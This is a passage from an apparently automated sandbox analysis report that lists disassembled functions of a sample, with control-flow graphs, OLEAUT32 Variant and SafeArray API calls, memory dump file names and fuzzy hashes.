                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEFD468 Relevance: 21.2, APIs: 14, Instructions: 226COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1232 6cefd468 1233 6cefd470-6cefd4e0 VariantInit * 3 1232->1233 1235 6cefd4ec-6cefd4f2 1233->1235 1236 6cefd4e2-6cefd4ea 1233->1236 1237 6cefd4f6-6cefd504 1235->1237 1236->1237 1238 6cefd51e-6cefd527 1237->1238 1239 6cefd506-6cefd50d 1237->1239 1242 6cefd529-6cefd530 1238->1242 1243 6cefd538-6cefd53c 1238->1243 1240 6cefd50f-6cefd512 1239->1240 1241 6cefd514-6cefd516 1239->1241 1245 6cefd518-6cefd51c 1240->1245 1241->1245 1242->1243 1244 6cefd532-6cefd536 1242->1244 1246 6cefd540-6cefd544 1243->1246 1244->1246 1245->1238 1245->1239 1247 6cefd54a-6cefd5c0 call 6cf39d66 SafeArrayCreateVector * 2 SafeArrayAccessData 1246->1247 1248 6cefd704-6cefd72f VariantClear * 3 1246->1248 1255 6cefd5c6-6cefd5ea call 6cf3a530 SafeArrayUnaccessData 1247->1255 1256 6cefd5c2-6cefd5c4 1247->1256 1249 6cefd76c-6cefd783 1248->1249 1250 6cefd731-6cefd757 1248->1250 1250->1233 1252 6cefd75d 1250->1252 1258 6cefd5ec-6cefd605 SafeArrayPutElement 1255->1258 1256->1258 1260 6cefd60b-6cefd629 1258->1260 1261 6cefd6e5-6cefd6eb 1258->1261 1262 6cefd62b-6cefd630 1260->1262 1263 6cefd633-6cefd64f SafeArrayPutElement VariantClear 1260->1263 1264 6cefd6ed-6cefd6f3 call 6cf39d2c 1261->1264 1265 6cefd6f6-6cefd6f8 1261->1265 1262->1263 1263->1261 1267 6cefd655-6cefd664 1263->1267 1264->1265 1268 6cefd6fa-6cefd6fb SafeArrayDestroy 1265->1268 1269 6cefd701 1265->1269 1271 6cefd66a-6cefd694 1267->1271 1272 6cefd762-6cefd767 call 6cf4c1e0 1267->1272 1268->1269 1269->1248 1284 6cefd697 call 127d171 1271->1284 1285 6cefd697 call 127d170 1271->1285 1272->1249 1274 6cefd699-6cefd69b 1274->1261 1275 6cefd69d-6cefd6a9 1274->1275 1275->1261 1276 6cefd6ab-6cefd6c1 call 6ceedb30 1275->1276 1276->1261 1279 6cefd6c3-6cefd6e0 call 6cef56b0 call 6cef6880 1276->1279 1279->1261 1284->1274 1285->1274
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32 ref: 6CEFD4B3
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32 ref: 6CEFD4C5
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFD4CC
                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6CEFD551
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEFD58B
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32 ref: 6CEFD5A6
                                                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32 ref: 6CEFD5B8
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEFD601
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEFD63E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$InitVariant$CreateElementVector$AccessData_malloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2723946344-0
                                                                                                                                                                                                                                              • Opcode ID: 47ccb0151b974e1b457614ad9d3934007185fc29ebe1d3ca622325310dc37659
                                                                                                                                                                                                                                              • Instruction ID: 93302013f9d34fed7742c2440cd7ca60778ea7f7b2e16d51217ebe08177c64eb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47ccb0151b974e1b457614ad9d3934007185fc29ebe1d3ca622325310dc37659
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10914A796043019FD315CF28C880A5BBBF9BFC9308F25895DE9A58B751D770EA06CB52
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF44C0 Relevance: 19.8, APIs: 13, Instructions: 261COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1286 6cef44c0-6cef4538 VariantInit * 2 SafeArrayCreateVector 1287 6cef453a-6cef453d 1286->1287 1288 6cef4542-6cef4564 SafeArrayPutElement VariantClear 1286->1288 1287->1288 1289 6cef476f-6cef4774 1288->1289 1290 6cef456a-6cef4598 SafeArrayCreateVector SafeArrayPutElement 1288->1290 1291 6cef477d-6cef479b VariantClear * 2 1289->1291 1292 6cef4776-6cef4777 SafeArrayDestroy 1289->1292 1290->1289 1293 6cef459e-6cef45b9 SafeArrayPutElement 1290->1293 1294 6cef479d-6cef47ad 1291->1294 1295 6cef47b0-6cef47c4 1291->1295 1292->1291 1293->1289 1296 6cef45bf-6cef45d2 SafeArrayPutElement 1293->1296 1294->1295 1296->1289 1297 6cef45d8-6cef45e3 1296->1297 1298 6cef45ef-6cef4604 1297->1298 1299 6cef45e5-6cef45ea call 6cf4c1e0 1297->1299 1298->1289 1302 6cef460a-6cef4615 1298->1302 1299->1298 1302->1289 1303 6cef461b-6cef469f 1302->1303 1310 6cef46a1-6cef471f 1303->1310 1316 6cef4721-6cef4758 1310->1316 1319 6cef475f-6cef476a call 6cefde60 1316->1319 1320 6cef475a call 6cf3919e 1316->1320 1322 6cef476c 1319->1322 1320->1319 1322->1289
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF44FF
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF4505
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEF4516
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEF4551
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF455A
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CEF4579
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEF4594
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CEF45B5
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CEF45CE
                                                                                                                                                                                                                                              • std::tr1::_Xweak.LIBCPMT ref: 6CEF475A
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF4777
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF4787
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF478D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1304965753-0
                                                                                                                                                                                                                                              • Opcode ID: 8a385e1e3f5c00811ebae54c176d5f0d7b2246191164a304d22a0e2f4dd9ea69
                                                                                                                                                                                                                                              • Instruction ID: ca0ecc45893cac4f9253b33bb5d146a34484f4f74a2a629535ea62da230865b8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a385e1e3f5c00811ebae54c176d5f0d7b2246191164a304d22a0e2f4dd9ea69
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6AA14D75A013099BDB54DBA4C984EAFB7B9FF8C710F14462DE506ABB80CA30E941CF60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEFBF00 Relevance: 18.2, APIs: 12, Instructions: 215COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1324 6cefbf00-6cefbf6a VariantInit * 4 1325 6cefbf6c-6cefbf71 1324->1325 1326 6cefbf74-6cefbf86 1324->1326 1325->1326 1327 6cefbf88-6cefbf8d 1326->1327 1328 6cefbf90-6cefbfbb call 6cefc150 1326->1328 1327->1328 1331 6cefc0c4-6cefc0cd 1328->1331 1332 6cefbfc1-6cefbfdf call 6cefc150 1328->1332 1334 6cefc0cf-6cefc0df 1331->1334 1335 6cefc0e2-6cefc149 call 6cf3a1f7 * 2 VariantClear * 4 call 6cf3948b 1331->1335 1332->1331 1339 6cefbfe5-6cefc019 call 6cefdc40 1332->1339 1334->1335 1345 6cefc01b-6cefc01e 1339->1345 1346 6cefc020-6cefc029 1339->1346 1348 6cefc035-6cefc037 call 6cef44c0 1345->1348 1349 6cefc02e 1346->1349 1350 6cefc02b-6cefc02c 1346->1350 1353 6cefc03c-6cefc03e 1348->1353 1351 6cefc030-6cefc032 1349->1351 1350->1351 1351->1348 1353->1331 1354 6cefc044-6cefc05c VariantInit VariantCopy 1353->1354 1356 6cefc05e-6cefc05f call 6cf4c1e0 1354->1356 1357 6cefc064-6cefc07a 1354->1357 1356->1357 1357->1331 1360 6cefc07c-6cefc094 VariantInit VariantCopy 1357->1360 1361 6cefc09c-6cefc0af 1360->1361 1362 6cefc096-6cefc097 call 6cf4c1e0 1360->1362 1361->1331 1365 6cefc0b1-6cefc0c0 1361->1365 1362->1361 1365->1331
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$Init$Clear$Copy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3833040332-0
                                                                                                                                                                                                                                              • Opcode ID: 486c0705fb3e7a3b03ae0ae4359c87ffbc72e369e2e1e304bd0f48077efeac96
                                                                                                                                                                                                                                              • Instruction ID: 943dc6fd3d9bc3ceaaefa68ec97e50233ba60ece3e6ef90d72e2dc2333e337b3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 486c0705fb3e7a3b03ae0ae4359c87ffbc72e369e2e1e304bd0f48077efeac96
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61819E71A01219AFDB14EFA8C880FEEBBB9FF49308F24455DE515A7740DB71A906CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF64D0 Relevance: 18.2, APIs: 12, Instructions: 159COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1366 6cef64d0-6cef6552 VariantInit * 3 SafeArrayCreateVector 1367 6cef655c-6cef657e SafeArrayPutElement VariantClear 1366->1367 1368 6cef6554-6cef6559 1366->1368 1369 6cef6584-6cef65a1 1367->1369 1370 6cef6661-6cef6663 1367->1370 1368->1367 1371 6cef65ab-6cef65c7 SafeArrayPutElement VariantClear 1369->1371 1372 6cef65a3-6cef65a6 1369->1372 1373 6cef666c-6cef669d VariantClear * 3 1370->1373 1374 6cef6665-6cef6666 SafeArrayDestroy 1370->1374 1371->1370 1375 6cef65cd-6cef65db 1371->1375 1372->1371 1374->1373 1376 6cef65dd-6cef65e2 call 6cf4c1e0 1375->1376 1377 6cef65e7-6cef6613 1375->1377 1376->1377 1389 6cef6616 call 127d171 1377->1389 1390 6cef6616 call 127d170 1377->1390 1379 6cef6618-6cef661a 1379->1370 1380 6cef661c-6cef6628 1379->1380 1380->1370 1381 6cef662a-6cef663c call 6ceedb30 1380->1381 1381->1370 1384 6cef663e-6cef6650 call 6cef56b0 call 6cef6880 1381->1384 1388 6cef6655-6cef665c 1384->1388 1388->1370 1389->1379 1390->1379
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32 ref: 6CEF650C
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF6519
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF6520
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C), ref: 6CEF6531
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEF656D
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF6576
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEF65B6
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF65BF
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEF6666
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF6677
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF667E
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF6685
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1625659656-0
                                                                                                                                                                                                                                              • Opcode ID: c168d4d6e8e672743aff138969d8f05ddf62d27a1a2224a2bf527d8b8c22f96b
                                                                                                                                                                                                                                              • Instruction ID: 064e741aabc87844daccb12e6f03e964f166a7998165eb12495bb1db74524920
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c168d4d6e8e672743aff138969d8f05ddf62d27a1a2224a2bf527d8b8c22f96b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 825128B26183059FC701DF64C880A5BBBF8EFD9704F118A1DFA6597250DB71E9068B92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEFCB90 Relevance: 18.1, APIs: 12, Instructions: 143COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1391 6cefcb90-6cefcc11 VariantInit * 2 SafeArrayCreateVector * 2 SafeArrayPutElement 1392 6cefcce7-6cefcce9 1391->1392 1393 6cefcc17-6cefcc4b SafeArrayPutElement VariantClear 1391->1393 1395 6cefcceb-6cefccec SafeArrayDestroy 1392->1395 1396 6cefccf2-6cefcd18 VariantClear * 2 1392->1396 1393->1392 1394 6cefcc51-6cefcc61 SafeArrayPutElement 1393->1394 1394->1392 1397 6cefcc67-6cefcc7b SafeArrayPutElement 1394->1397 1395->1396 1397->1392 1398 6cefcc7d-6cefcc8e 1397->1398 1399 6cefcc9a-6cefccc8 1398->1399 1400 6cefcc90-6cefcc95 call 6cf4c1e0 1398->1400 1405 6cefccc9 call 127d171 1399->1405 1406 6cefccc9 call 127d170 1399->1406 1400->1399 1402 6cefcccb-6cefcccd 1402->1392 1403 6cefcccf-6cefcce1 1402->1403 1403->1392 1404 6cefcce3 1403->1404 1404->1392 1405->1402 1406->1402
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFCBCA
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFCBD3
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEFCBE4
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEFCBF6
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEFCC0D
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CEFCC39
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFCC42
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CEFCC5D
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CEFCC77
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEFCCEC
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFCCFC
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFCD02
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3548156019-0
                                                                                                                                                                                                                                              • Opcode ID: a4c2f02b29cd4d9fcb70b42c45cd07778ae132cfad2363cf48bb1c56028618b8
                                                                                                                                                                                                                                              • Instruction ID: 649aba7eb37936528cf408b27f75ef3fee92eb70b576c7e754b7b4e62c1c07e5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4c2f02b29cd4d9fcb70b42c45cd07778ae132cfad2363cf48bb1c56028618b8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A5130B5E002499FDB00DFA9C894EDEBFB8FF49714F10815AEA15A7741D770A905CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEA350 Relevance: 16.7, APIs: 11, Instructions: 206COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1407 6ceea350-6ceea3bd VariantInit * 3 call 6cef38e0 1410 6ceea505-6ceea528 VariantClear * 3 1407->1410 1411 6ceea3c3-6ceea3d6 1407->1411 1412 6ceea52a-6ceea52d 1410->1412 1413 6ceea532-6ceea546 1410->1413 1414 6ceea3d8-6ceea3dd 1411->1414 1415 6ceea3e0-6ceea3f7 VariantCopy 1411->1415 1412->1413 1414->1415 1416 6ceea3ff-6ceea411 VariantClear 1415->1416 1417 6ceea3f9-6ceea3fa call 6cf4c1e0 1415->1417 1419 6ceea41d-6ceea42b 1416->1419 1420 6ceea413-6ceea418 call 6cf4c1e0 1416->1420 1417->1416 1422 6ceea42d-6ceea42f 1419->1422 1423 6ceea431-6ceea433 1419->1423 1420->1419 1424 6ceea436-6ceea43a 1422->1424 1423->1424 1425 6ceea43c-6ceea43e 1424->1425 1426 6ceea440 1424->1426 1427 6ceea442-6ceea477 1425->1427 1426->1427 1443 6ceea47a call 127d171 1427->1443 1444 6ceea47a call 127d170 1427->1444 1428 6ceea47c-6ceea47e 1428->1410 1429 6ceea484-6ceea493 1428->1429 1430 6ceea49f-6ceea4b0 1429->1430 1431 6ceea495-6ceea49a call 6cf4c1e0 1429->1431 1433 6ceea4b6-6ceea4b8 1430->1433 1434 6ceea4b2-6ceea4b4 1430->1434 1431->1430 1435 6ceea4bb-6ceea4bf 1433->1435 1434->1435 1436 6ceea4c5 1435->1436 1437 6ceea4c1-6ceea4c3 1435->1437 1438 6ceea4c7-6ceea503 1436->1438 1437->1438 1438->1410 1440 6ceea549-6ceea578 VariantClear * 3 1438->1440 1441 6ceea57a-6ceea57f 1440->1441 1442 6ceea582-6ceea596 1440->1442 1441->1442 1443->1428 1444->1428
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$Clear$Init$Copy
                                                                                                                                                                                                                                              • String ID:
